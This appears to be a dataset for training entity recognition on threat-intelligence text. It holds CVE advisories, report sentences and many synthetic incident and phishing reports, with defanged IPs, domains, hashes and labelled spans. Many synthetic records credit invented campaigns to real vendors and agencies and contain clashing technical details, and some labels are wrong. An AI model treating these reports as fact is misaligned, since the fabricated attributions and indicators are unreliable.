] 0 through 8 [ . ] 3 [ . ] 1 [ . ] 20, LTS2024 release versions 7[.]13[.]1[.]0 through 7[.]13[.]1[.]50, contain a use of weak credentials vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to unauthorized access to the system.", "spans": {"Vulnerability: CVE-2026-23853": [[0, 14]], "Vulnerability: unauthorized access": [[458, 477]], "Indicator: 7.7.1.0": [[116, 141]], "Indicator: 8.3.1.0": [[179, 204]], "Indicator: 8.3.1.20": [[213, 239]], "Indicator: 7.13.1.0": [[266, 280]], "Indicator: 7.13.1.50": [[289, 304]]}, "info": {"id": "nvd_2026_23853", "source": "defanged_augment"}} {"text": "The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials , allowing the actors to gain access to the targeted network . This was the case in two known intrusions in 2015 , where attackers named the implant DLL \" ASPNET_FILTER[.]DLL \" to disguise it as the DLL for the ASP[ . ]NET ISAPI Filter .", "spans": {"Indicator: ASPNET_FILTER.DLL": [[281, 300]], "Indicator: ASP.NET ISAPI Filter": [[337, 361]]}, "info": {"id": "cyberner_stix_train_005017", "source": "defanged_augment"}} {"text": "Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions). Supported versions that are affected are 12[.]2[.]1[.]3.0 and 12[.]2[.]1[.]4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products. 
Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Business Intelligence Enterprise Edition. CVSS 3.0 Base Score 7.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L).", "spans": {"Indicator: 12.2.1.3": [[178, 192]], "Indicator: 12.2.1.4": [[199, 213]], "Organization: Oracle": [[21, 27], [80, 86], [325, 331], [491, 497], [705, 711], [820, 826], [963, 969]], "Vulnerability: denial of service": [[928, 945]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-2537"}} {"text": "Secureworks published a threat intelligence report linking Charming Kitten to a new campaign exploiting CVE-2020-49453 in Ubuntu 22.04. The attackers deployed Emotet via LinPEAS, establishing C2 communication with 186 [ . ] 178 [ . ] 177 [ . ] 247 and cacheupdate[.]info. A secondary payload was downloaded from hxxps://gateway-node[.]net/panel/index.html. The malware binary (MD5: 348e1d59429cea872abbcce3350fad25) was dropped to /opt/app/bin/taskhost.exe. Phishing emails were sent from account@mail-service[.]info targeting enterprise users. 
A backup C2 server was identified at 58[.]99[.]232[.]239.", "spans": {"Organization: Secureworks": [[0, 11]], "Vulnerability: CVE-2020-49453": [[104, 118]], "System: Ubuntu 22.04": [[122, 134]], "Malware: Emotet": [[159, 165]], "Indicator: 186.178.177.247": [[214, 247]], "Indicator: cacheupdate.info": [[252, 270]], "Indicator: hxxps://gateway-node.net/panel/index.html": [[312, 355]], "Indicator: 348e1d59429cea872abbcce3350fad25": [[382, 414]], "Indicator: account@mail-service.info": [[489, 516]], "Indicator: 58.99.232.239": [[582, 601]]}, "info": {"id": "synth_v2_00164", "source": "defanged_augment"}} {"text": "IOC Bulletin - BumbleBee Campaign:\nNetwork Indicators:\n- 192 [ . ] 104 [ . ] 229 [ . ] 181\n- 10[.]197[.]195[.]63\n- 10[.]241[.]62[.]90\n- edgeapi[ . ]io\n- authdata[ . ]xyz\nURLs:\n- hxxps://nodegateway[.]com/gate.php\n- hxxps://portalrelay[ . ]online/collect\nEmail Senders:\n- noreply@urgent-notice[ . ]online\n- confirm@document-share[.]link\nFile Indicators:\n- SHA256: f5d1bc9b876af8dc58341783c1fdc9e966c8dfb00fe823e4f72491fbbbbca166\n- SHA256: 057d39b05f1838fd299857f78b68eb2f6d1ff895720cbbabea08b9ee424399e7\n- Drop path: C:\\Windows\\System32\\update.dll", "spans": {"Malware: BumbleBee": [[15, 24]], "Indicator: 192.104.229.181": [[57, 90]], "Indicator: 10.197.195.63": [[93, 112]], "Indicator: 10.241.62.90": [[115, 133]], "Indicator: edgeapi.io": [[136, 150]], "Indicator: authdata.xyz": [[153, 169]], "Indicator: https://nodegateway.com/gate.php": [[178, 212]], "Indicator: hxxps://portalrelay.online/collect": [[215, 253]], "Indicator: noreply@urgent-notice.online": [[271, 303]], "Indicator: confirm@document-share.link": [[306, 335]], "Indicator: f5d1bc9b876af8dc58341783c1fdc9e966c8dfb00fe823e4f72491fbbbbca166": [[363, 427]], "Indicator: 057d39b05f1838fd299857f78b68eb2f6d1ff895720cbbabea08b9ee424399e7": [[438, 502]]}, "info": {"id": "synth_v2_01476", "source": "defanged_augment"}} {"text": "Malwr[ . 
]com observed this site in association with another sample that called out to mailsinfo[.]net – a host identified in the Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA blog .", "spans": {"Indicator: Malwr.com": [[0, 13]], "Indicator: mailsinfo.net": [[87, 102]], "Malware: KASPERAGENT": [[172, 183]], "Malware: MICROPSIA": [[188, 197]]}, "info": {"id": "cyberner_stix_train_005603", "source": "defanged_augment"}} {"text": "The threat actor’s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users . The email contained an attachment named Seminar-Invitation[ . ]doc , which is a malicious Microsoft Word document we track as ThreeDollars .", "spans": {"Malware: malicious payload": [[72, 89]], "Organization: users": [[154, 159]], "Indicator: Seminar-Invitation.doc": [[202, 228]], "Malware: ThreeDollars": [[288, 300]]}, "info": {"id": "cyberner_stix_train_007312", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Huntress identified a large-scale phishing operation. Emails originated from info@account-update[.]xyz and noreply@auth-check[ . ]org, spoofing legitimate services. Victims were directed to hxxp://cache-storage[ . ]site/panel/index.html which hosted a credential harvesting page on datacloud[.]online. A secondary link hxxp://syncnode[.]club/wp-content/uploads/doc.php delivered DanaBot (SHA256: 5e8f02d0217e758dfb23b357a96e17b301ff4bad7de100ae0faed7d30176a1ed). 
The malware was saved to C:\\Users\\admin\\Downloads\\taskhost.exe and established C2 with 10[.]44[.]24[.]31.", "spans": {"Organization: Huntress": [[26, 34]], "Indicator: info@account-update.xyz": [[103, 128]], "Indicator: noreply@auth-check.org": [[133, 159]], "Indicator: http://cache-storage.site/panel/index.html": [[216, 262]], "Indicator: datacloud.online": [[308, 326]], "Indicator: hxxp://syncnode.club/wp-content/uploads/doc.php": [[345, 394]], "Malware: DanaBot": [[405, 412]], "Indicator: 5e8f02d0217e758dfb23b357a96e17b301ff4bad7de100ae0faed7d30176a1ed": [[422, 486]], "Indicator: 10.44.24.31": [[576, 593]]}, "info": {"id": "synth_v2_00860", "source": "defanged_augment"}} {"text": "By integrating the findings with prior research , it was possible to connect MONSOON directly with infrastructure used by the HANGOVER group via a series of strong connections . In late September 2015 Mofang used the website of Myanmara 's national airline hosted at www[.]flymna[.]com for an attack against an organization in Myanmar .", "spans": {"Indicator: www.flymna.com": [[267, 285]]}, "info": {"id": "cyberner_stix_train_004429", "source": "defanged_augment"}} {"text": "Artifact Analysis for Dridex campaign:\nStage 1 dropper at C:\\Windows\\Tasks\\shell.php - SHA1: ba4a697129fe0a157e80462ed3bd2916fd333014\nStage 2 loader at /tmp/implant.so - SHA1: 67f93cd86492d0b5f5dc4287b06703f010e7fb66\nFinal payload at /home/user/.config/helper.sh - MD5: 6b36d9ab6a185c99cb7fbacd3f75f406\nExfiltration module - SHA256: a8a886bf32d7f7476559d79d9cb660c10c9d08977fa2d59ee92d7fd4394568d2\nAll stages communicated with 172 [ . ] 81 [ . ] 36 [ . ] 92. 
Burp Suite signatures detected in Stage 2.", "spans": {"Malware: Dridex": [[22, 28]], "Indicator: ba4a697129fe0a157e80462ed3bd2916fd333014": [[93, 133]], "Indicator: 67f93cd86492d0b5f5dc4287b06703f010e7fb66": [[176, 216]], "Indicator: 6b36d9ab6a185c99cb7fbacd3f75f406": [[270, 302]], "Indicator: a8a886bf32d7f7476559d79d9cb660c10c9d08977fa2d59ee92d7fd4394568d2": [[333, 397]], "Indicator: 172.81.36.92": [[427, 457]]}, "info": {"id": "synth_v2_01870", "source": "defanged_augment"}} {"text": "Microsoft MSRC detected a multi-stage attack chain. The initial phishing email from info@mail-service[.]info contained a link to hxxps://relaygateway[.]dev/admin/config. This redirected to hxxp://cdnstorage[.]cc/portal/verify on update-gateway[ . ]tech. A secondary email from helpdesk@mail-service[ . ]info pointed to hxxp://cdndata[.]xyz/portal/verify which delivered AgentTesla. The final payload callback was hxxp://backup-storage[.]link/assets/js/payload.js resolving to 192 [ . ] 106 [ . ] 244 [ . ] 19 via datalogin[.]site.", "spans": {"Organization: Microsoft MSRC": [[0, 14]], "Indicator: info@mail-service.info": [[84, 108]], "Indicator: hxxps://relaygateway.dev/admin/config": [[129, 168]], "Indicator: http://cdnstorage.cc/portal/verify": [[189, 225]], "Indicator: update-gateway.tech": [[229, 252]], "Indicator: helpdesk@mail-service.info": [[277, 307]], "Indicator: http://cdndata.xyz/portal/verify": [[319, 353]], "Malware: AgentTesla": [[370, 380]], "Indicator: hxxp://backup-storage.link/assets/js/payload.js": [[413, 462]], "Indicator: 192.106.244.19": [[476, 508]], "Indicator: datalogin.site": [[513, 529]]}, "info": {"id": "synth_v2_01789", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Recorded Future identified a large-scale phishing operation. Emails originated from noreply@account-update[.]xyz and updates@secure-verify[ . ]net, spoofing legitimate services. Victims were directed to hxxp://loginportal[ . 
]site/admin/config which hosted a credential harvesting page on proxy-update[.]top. A secondary link hxxps://portalmail[.]com/callback delivered Cobalt Strike (MD5: 3273f400313a6299159989ed01de5273). The malware was saved to /usr/local/bin/taskhost.exe and established C2 with 10[.]193[.]215[.]221.", "spans": {"Organization: Recorded Future": [[26, 41]], "Indicator: noreply@account-update.xyz": [[110, 138]], "Indicator: updates@secure-verify.net": [[143, 172]], "Indicator: hxxp://loginportal.site/admin/config": [[229, 269]], "Indicator: proxy-update.top": [[315, 333]], "Indicator: https://portalmail.com/callback": [[352, 385]], "Malware: Cobalt Strike": [[396, 409]], "Indicator: 3273f400313a6299159989ed01de5273": [[416, 448]], "Indicator: 10.193.215.221": [[528, 548]]}, "info": {"id": "synth_v2_01057", "source": "defanged_augment"}} {"text": "The MuddyWater threat group, attributed to Iran's Ministry of Intelligence and Security, deployed a new backdoor called PhonyC2 against Israeli organizations. The malware was delivered via phishing emails containing malicious Excel macros. PhonyC2 communicates with the domain connect[ . ]civilstream[ . ]com using HTTPS POST requests. The backdoor supports file upload, download, and arbitrary command execution on compromised Windows hosts.", "spans": {"Malware: PhonyC2": [[120, 127], [240, 247]], "Indicator: connect.civilstream.com": [[277, 308]], "System: Windows": [[428, 435]]}, "info": {"id": "mandiant_00039", "source": "defanged_augment"}} {"text": "The loader first dynamically rebuilds a simple import address table ( IAT ) , resolving all the API needed from Kernel32 and NtDll libraries . The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method , specifically attempting to load MagicHound.Rollover . Winnti : bb4ab0d8d05a3404f1f53f152ebd79f4ba4d4d81 2018-10-10 09:57:31 hxxp://checkin[ . ]travelsanignacio[ . ]com . 
Developed in - house using C++ , the NoEscape ransomware uses a hybrid approach to encryption , combining ChaCha20 and RSA encryption algorithms for file encryption and key protection .", "spans": {"Indicator: bb4ab0d8d05a3404f1f53f152ebd79f4ba4d4d81": [[312, 352]], "Indicator: http://checkin.travelsanignacio.com": [[373, 416]], "Malware: NoEscape ransomware": [[456, 475]]}, "info": {"id": "cyberner_stix_train_002601", "source": "defanged_augment"}} {"text": "Check that the mutex WininetStartupMutex0 does not already exist Check that no DLL whose base name has hash value of 0xC9CEF3E4 is mapped into the malware address space The hashes in these checks are most likely correspond to sandbox or security products that the FinFisher authors want to avoid . During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . This white paper describes the steganography algorithm used in two distinct loader variants and looks at the launcher of the backdoor that was encoded in one of the .png cover images . mcvsocfg[ . ]dll : In April , Talos discovered a new ransomware actor , RA Group , conducting double extortion attacks using their ransomware variant based on leaked Babuk source code .", "spans": {"Malware: FinFisher": [[264, 273]], "Malware: Microsoft ActiveMime file": [[372, 397]], "Indicator: mcvsocfg.dll": [[625, 641]], "Organization: Talos": [[655, 660]], "Malware: Babuk source code": [[791, 808]]}, "info": {"id": "cyberner_stix_train_005691", "source": "defanged_augment"}} {"text": "The initial sample we intercepted was a Microsoft Word document ( SHA256 : 2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f ) with the filename crash list ( Lion Air Boeing 737 )[ . 
]docx using the author name Joohn .", "spans": {"Organization: Microsoft": [[40, 49]], "Indicator: 2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f": [[75, 139]], "Indicator: crash list ( Lion Air Boeing 737 ).docx": [[160, 203]]}, "info": {"id": "cyberner_stix_train_002479", "source": "defanged_augment"}} {"text": "Malware Analysis Report: Conti (SHA256: ecf918534bbe284a5ca72aec778d12972d7e503d1366b6a35fdb0322e8707549). Upon execution on Zyxel USG, the sample creates /opt/app/bin/implant.so and injects into legitimate processes. Network analysis shows beaconing to 10[.]38[.]90[.]96 every 60 seconds and DNS queries to login-cache[.]link. The second stage was fetched from hxxps://api-api[ . ]com/assets/js/payload.js and written to C:\\ProgramData\\payload.bin. The payload uses BITSAdmin-style techniques for defense evasion. A secondary hash (SHA256: ca5ef186bf7de79650af30eaa62b1214e435e406447a2461820d543ee2461302) was extracted from the unpacked payload.", "spans": {"Malware: Conti": [[25, 30]], "Indicator: ecf918534bbe284a5ca72aec778d12972d7e503d1366b6a35fdb0322e8707549": [[40, 104]], "System: Zyxel USG": [[125, 134]], "Indicator: 10.38.90.96": [[254, 271]], "Indicator: login-cache.link": [[308, 326]], "Indicator: hxxps://api-api.com/assets/js/payload.js": [[362, 406]], "Indicator: ca5ef186bf7de79650af30eaa62b1214e435e406447a2461820d543ee2461302": [[541, 605]]}, "info": {"id": "synth_v2_00546", "source": "defanged_augment"}} {"text": "Check Point Research published a threat intelligence report linking FIN7 to a new campaign exploiting CVE-2022-27335 in Palo Alto PAN-OS. The attackers deployed PlugX via LinPEAS, establishing C2 communication with 14[.]135[.]59[.]14 and edgedata[ . ]site. A secondary payload was downloaded from hxxp://proxysync[ . ]org/login. The malware binary (MD5: 7d27e5624bcd4fc2a207a778570181ee) was dropped to C:\\Windows\\Tasks\\lsass.dmp. Phishing emails were sent from ceo@urgent-notice[.]online targeting enterprise users. 
A backup C2 server was identified at 172 [ . ] 204 [ . ] 243 [ . ] 78.", "spans": {"Organization: Check Point Research": [[0, 20]], "Vulnerability: CVE-2022-27335": [[102, 116]], "System: Palo Alto PAN-OS": [[120, 136]], "Malware: PlugX": [[161, 166]], "Indicator: 14.135.59.14": [[215, 233]], "Indicator: edgedata.site": [[238, 255]], "Indicator: http://proxysync.org/login": [[297, 327]], "Indicator: 7d27e5624bcd4fc2a207a778570181ee": [[354, 386]], "Indicator: ceo@urgent-notice.online": [[462, 488]], "Indicator: 172.204.243.78": [[554, 586]]}, "info": {"id": "synth_v2_00216", "source": "defanged_augment"}} {"text": "Content of bdata.xml file : It can be added to the /system/etc/sysconfig/ path to allowlist specified implant components from the battery saving system . The malware known as RATANKBA is just one of the weapons in Lazarus ' arsenal . APT33 : 162 [ . ] 250 [ . ] 145 [ . ] 234 mynetwork[ . ]ddns[ . ]net . When it comes to Cuba and similar threats , access to highfidelity threat intelligence to help identify the highest risk , most actively exploitable vulnerabilities can help prioritization efforts when organizations are faced with a backlog of vulnerabilities to address .", "spans": {"Indicator: 162.250.145.234": [[242, 275]], "Indicator: mynetwork.ddns.net": [[276, 302]]}, "info": {"id": "cyberner_stix_train_006347", "source": "defanged_augment"}} {"text": "A backdoor also known as: W32.UsernameReimuatH.Trojan Worm/W32[.]WBNA[.]294912[.]AU Trojan.Win32.Diple!O Trojan.Beebone.D Trojan/VBObfus.fz Win32.Worm.Pronny.d Win32/VB.KXfdHDB WORM_VOBFUS.SM37 Win.Packer.VBCrypt-5731517-0 Worm.Win32.Vobfus.erof Trojan.Win32.Vobfus.enwdjc Win32.Worm.Vobfus.Wvay Win32.HLLW.Autoruner2.18084 WORM_VOBFUS.SM37 BehavesLike.Win32.Autorun.dh Win32.Virut.ce.57344 Trojan.Symmi.D13A73 Trojan.Win32.A.Diple.299008.BAT Worm.Win32.Vobfus.erof Worm/Win32.WBNA.R108353 TScope.Trojan.VB Worm.Win32.Vobfus", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: W32.WBNA.294912.AU": [[59, 
83]]}, "info": {"id": "cyner2_train_001462", "source": "defanged_augment"}} {"text": "Blog Post by SentinelOne: Tracking Salt Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2024-35928 against Windows Server 2019 deployments. The initial access vector involves spear-phishing emails from admin@credential-check[ . ]site delivering TrickBot. Post-compromise, the attackers deploy PlugX and use Mimikatz for reconnaissance. C2 infrastructure includes 34 [ . ] 197 [ . ] 111 [ . ] 48 and portalsecure[.]dev. A staging server at hxxps://cloudlogin[ . ]site/gate.php hosts additional tooling. Key artifact: C:\\Users\\admin\\AppData\\Local\\Temp\\backdoor.elf (SHA256: 21c6009812e29c0115d91c20b55be492cab84bd4484dd4a121ea75b03b1f8563).", "spans": {"Organization: SentinelOne": [[13, 24]], "Vulnerability: CVE-2024-35928": [[127, 141]], "System: Windows Server 2019": [[150, 169]], "Indicator: admin@credential-check.site": [[245, 276]], "Malware: TrickBot": [[288, 296]], "Malware: PlugX": [[336, 341]], "Indicator: 34.197.111.48": [[406, 437]], "Indicator: portalsecure.dev": [[442, 460]], "Indicator: https://cloudlogin.site/gate.php": [[482, 518]], "Indicator: 21c6009812e29c0115d91c20b55be492cab84bd4484dd4a121ea75b03b1f8563": [[615, 679]]}, "info": {"id": "synth_v2_01680", "source": "defanged_augment"}} {"text": "FBI published a threat intelligence report linking Flax Typhoon to a new campaign exploiting CVE-2021-16698 in Apache Struts. The attackers deployed FormBook via PowerView, establishing C2 communication with 172 [ . ] 78 [ . ] 216 [ . ] 203 and edgenode[ . ]dev. A secondary payload was downloaded from hxxps://edgecdn[ . ]link/assets/js/payload.js. The malware binary (SHA1: 269d116dc2f561c564d776bf88795a92865561a6) was dropped to C:\\ProgramData\\taskhost.exe. Phishing emails were sent from helpdesk@auth-check[ . ]org targeting enterprise users. 
A backup C2 server was identified at 19[.]229[.]245[.]150.", "spans": {"Organization: FBI": [[0, 3]], "Vulnerability: CVE-2021-16698": [[93, 107]], "System: Apache Struts": [[111, 124]], "Malware: FormBook": [[149, 157]], "Indicator: 172.78.216.203": [[208, 240]], "Indicator: edgenode.dev": [[245, 261]], "Indicator: https://edgecdn.link/assets/js/payload.js": [[303, 348]], "Indicator: 269d116dc2f561c564d776bf88795a92865561a6": [[376, 416]], "Indicator: helpdesk@auth-check.org": [[493, 520]], "Indicator: 19.229.245.150": [[586, 606]]}, "info": {"id": "synth_v2_00090", "source": "defanged_augment"}} {"text": "X-Force IRIS discovered that the threat actor was hosting at least one malicious executable on a server hosted on ntg-sa[.]com .", "spans": {"Organization: X-Force IRIS": [[0, 12]], "Indicator: ntg-sa.com": [[114, 126]]}, "info": {"id": "cyberner_stix_train_007628", "source": "defanged_augment"}} {"text": "The LockBit attack began with exploitation of CVE-2023-20198. The ransomware binary (SHA256: c393ca0eb7bc6f728f14083b5758604c5b8faf4892456ae05961359e44cf655e) was deployed to C:\\Windows\\System32\\drivers\\ndis_helper.sys. Ransom negotiation portal was hosted at monitor-net[[ . ]]org (151[.]172[.]125[.]55). Contact email for payment: alert@security-warning[.]dev.", "spans": {"Malware: LockBit": [[4, 11]], "Vulnerability: CVE-2023-20198": [[46, 60]], "Indicator: c393ca0eb7bc6f728f14083b5758604c5b8faf4892456ae05961359e44cf655e": [[93, 157]], "Indicator: monitor-net[.]org": [[260, 281]], "Indicator: 151.172.125.55": [[283, 303]], "Indicator: alert@security-warning.dev": [[333, 361]]}, "info": {"id": "synth_00028", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2026-10752 is a critical buffer overflow affecting MOVEit Transfer. CrowdStrike confirmed active exploitation by Sandworm in the wild. 
Exploitation delivers BlackCat (SHA256: 5f0ad18e93b1440da3a0705e96a645fa180928b3fa457be1585cf97d97751d69) which is dropped to /usr/local/bin/beacon.dll. The exploit payload is hosted at hxxp://gatewaysync[.]com/download/update.exe and communicates to 10 [ . ] 204 [ . ] 112 [ . ] 237 for C2.", "spans": {"Vulnerability: CVE-2026-10752": [[24, 38]], "Vulnerability: buffer overflow": [[53, 68]], "System: MOVEit Transfer": [[79, 94]], "Organization: CrowdStrike": [[96, 107]], "Malware: BlackCat": [[185, 193]], "Indicator: 5f0ad18e93b1440da3a0705e96a645fa180928b3fa457be1585cf97d97751d69": [[203, 267]], "Indicator: http://gatewaysync.com/download/update.exe": [[349, 393]], "Indicator: 10.204.112.237": [[414, 446]]}, "info": {"id": "synth_v2_00781", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 91[.]163[.]253[.]109, the Dragos IR team identified Dridex running as /var/tmp/lsass.dmp. The threat actor, believed to be Scattered Spider, used CrackMapExec for credential harvesting and Rubeus for lateral movement. Exfiltrated data was sent to portal-gateway[.]io and edgeedge[.]online. The initial dropper (SHA1: 943c555498a203507d3f868cae0be4c2e7913e02) was delivered via a phishing email from account@document-share[.]link. A second C2 node was observed at 178 [ . ] 211 [ . ] 170 [ . 
] 36, with a persistence mechanism writing to C:\\ProgramData\\shell.php.", "spans": {"Indicator: 91.163.253.109": [[64, 84]], "Organization: Dragos": [[90, 96]], "Malware: Dridex": [[116, 122]], "Indicator: portal-gateway.io": [[311, 330]], "Indicator: edgeedge.online": [[335, 352]], "Indicator: 943c555498a203507d3f868cae0be4c2e7913e02": [[381, 421]], "Indicator: account@document-share.link": [[463, 492]], "Indicator: 178.211.170.36": [[527, 559]]}, "info": {"id": "synth_v2_00363", "source": "defanged_augment"}} {"text": "The group has repeatedly used social media , particularly LinkedIn , to identify and interact with employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT . This includes Python scripts . Usually , the Stageless Meterpreter has the Ext_server_stdapi[.]x64[.]dll” , Ext_server_extapi[.]x64[.]dll” , and Ext_server_espia[ . ]x64[ . ]dll” extensions .", "spans": {"Organization: social media": [[30, 42]], "Indicator: Stageless Meterpreter": [[257, 278]], "Indicator: Ext_server_stdapi.x64.dll”": [[287, 317]], "Indicator: Ext_server_extapi.x64.dll”": [[320, 350]], "Indicator: Ext_server_espia.x64.dll”": [[357, 390]]}, "info": {"id": "cyberner_stix_train_005640", "source": "defanged_augment"}} {"text": "Vulnerability in the Oracle Applications DBA component of Oracle Database Server. Supported versions that are affected are 12 [ . ] 1 [ . ] 0 [ . ] 2, 12[.]2[.]0[.]1, 18c and 19c. Easily exploitable vulnerability allows low privileged attacker having Local Logon privilege with logon to the infrastructure where Oracle Applications DBA executes to compromise Oracle Applications DBA. Successful attacks require human interaction from a person other than the attacker. 
Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications DBA accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Applications DBA. CVSS 3.0 Base Score 3.9 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L).", "spans": {"Indicator: 12.1.0.2": [[123, 149]], "Indicator: 12.2.0.1": [[151, 165]], "System: Oracle Database": [[58, 73]], "Organization: Oracle": [[21, 27], [312, 318], [359, 365], [579, 585], [698, 704]], "Vulnerability: denial of service": [[663, 680]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-2568"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 29 [ . ] 61 [ . ] 189 [ . ] 147, the Google TAG IR team identified RedLine Stealer running as C:\\Program Files\\Common Files\\update.dll. The threat actor, believed to be Diamond Sleet, used Metasploit for credential harvesting and ADFind for lateral movement. Exfiltrated data was sent to mailbackup[ . ]info and updatelogin[ . ]org. The initial dropper (SHA256: 750cff1ae73a22643b24fd5bb0d0b5bd02264854f51c63f9623c8d6c8869740e) was delivered via a phishing email from verify@phishing-domain[.]com. A second C2 node was observed at 11[.]78[.]60[.]96, with a persistence mechanism writing to /home/user/.config/agent.py.", "spans": {"Indicator: 29.61.189.147": [[64, 95]], "Organization: Google TAG": [[101, 111]], "Malware: RedLine Stealer": [[131, 146]], "Indicator: mailbackup.info": [[352, 371]], "Indicator: updatelogin.org": [[376, 395]], "Indicator: 750cff1ae73a22643b24fd5bb0d0b5bd02264854f51c63f9623c8d6c8869740e": [[426, 490]], "Indicator: verify@phishing-domain.com": [[532, 560]], "Indicator: 11.78.60.96": [[595, 612]]}, "info": {"id": "synth_v2_00285", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 37 [ . ] 100 [ . ] 221 [ . 
] 150, the Dragos IR team identified Latrodectus running as /home/user/.config/implant.so. The threat actor, believed to be Mustang Panda, used Impacket for credential harvesting and WinPEAS for lateral movement. Exfiltrated data was sent to dataportal[.]site and authsync[.]dev. The initial dropper (SHA1: 67be9dd5c4ef78fb6114649b843cad70ed0844d3) was delivered via a phishing email from ceo@document-share[.]link. A second C2 node was observed at 172[.]112[.]16[.]122, with a persistence mechanism writing to /home/user/.config/config.dat.", "spans": {"Indicator: 37.100.221.150": [[64, 96]], "Organization: Dragos": [[102, 108]], "Malware: Latrodectus": [[128, 139]], "Indicator: dataportal.site": [[333, 350]], "Indicator: authsync.dev": [[355, 369]], "Indicator: 67be9dd5c4ef78fb6114649b843cad70ed0844d3": [[398, 438]], "Indicator: ceo@document-share.link": [[480, 505]], "Indicator: 172.112.16.122": [[540, 560]]}, "info": {"id": "synth_v2_00401", "source": "defanged_augment"}} {"text": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10[.]3[.]6[.]0.0, 12[.]1[.]3[.]0.0, 12[.]2[.]1[.]3.0 and 12[.]2[.]1[.]4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data as well as unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). 
CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).", "spans": {"Indicator: 10.3.6.0": [[143, 157]], "Indicator: 12.1.3.0": [[161, 175]], "Indicator: 12.2.1.3": [[179, 193]], "Indicator: 12.2.1.4": [[200, 214]], "Organization: Oracle": [[21, 27], [55, 61], [326, 332], [467, 473], [656, 662], [746, 752]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-14572"}} {"text": "Phishing Campaign Report: FBI identified a large-scale phishing operation. Emails originated from billing@login-portal[.]tech and report@urgent-notice[.]online, spoofing legitimate services. Victims were directed to hxxp://api-backup[ . ]online/wp-content/uploads/doc.php which hosted a credential harvesting page on storageapi[.]club. A secondary link hxxps://relay-login[ . ]club/collect delivered Vidar (MD5: 8bed84c16529363b442c0a57cc2c62a9). The malware was saved to C:\\Windows\\Tasks\\svchost.exe and established C2 with 51[.]208[.]112[.]172.", "spans": {"Organization: FBI": [[26, 29]], "Indicator: billing@login-portal.tech": [[98, 125]], "Indicator: report@urgent-notice.online": [[130, 159]], "Indicator: hxxp://api-backup.online/wp-content/uploads/doc.php": [[216, 271]], "Indicator: storageapi.club": [[317, 334]], "Indicator: hxxps://relay-login.club/collect": [[353, 389]], "Malware: Vidar": [[400, 405]], "Indicator: 8bed84c16529363b442c0a57cc2c62a9": [[412, 444]], "Indicator: 51.208.112.172": [[525, 545]]}, "info": {"id": "synth_v2_01079", "source": "defanged_augment"}} {"text": "Poison Ivy is a remote access tool that is freely available for download from its official web site at www[ . ]poisonivy-rat[ . ]com .", "spans": {"Indicator: www.poisonivy-rat.com": [[103, 132]]}, "info": {"id": "dnrti_train_000899", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Tenable identified a large-scale phishing operation. Emails originated from verify@phishing-domain[.]com and verify@credential-check[.]site, spoofing legitimate services. 
Victims were directed to hxxp://mailsync[ . ]info/assets/js/payload.js which hosted a credential harvesting page on apibackup[ . ]site. A secondary link hxxp://edge-login[ . ]dev/api/v2/auth delivered IcedID (SHA1: 7f621723a29e0d15c417f54bb2bd88462fc1bcd5). The malware was saved to /opt/app/bin/helper.sh and established C2 with 108[.]248[.]198[.]105.", "spans": {"Organization: Tenable": [[26, 33]], "Indicator: verify@phishing-domain.com": [[102, 130]], "Indicator: verify@credential-check.site": [[135, 165]], "Indicator: http://mailsync.info/assets/js/payload.js": [[222, 267]], "Indicator: apibackup.site": [[313, 331]], "Indicator: hxxp://edge-login.dev/api/v2/auth": [[350, 387]], "Malware: IcedID": [[398, 404]], "Indicator: 7f621723a29e0d15c417f54bb2bd88462fc1bcd5": [[412, 452]], "Indicator: 108.248.198.105": [[527, 548]]}, "info": {"id": "synth_v2_00991", "source": "defanged_augment"}} {"text": "A backdoor also known as: W32.SampleswareTG.Trojan Trojan-GameThief.Win32.Magania!O Backdoor.Farfli.O 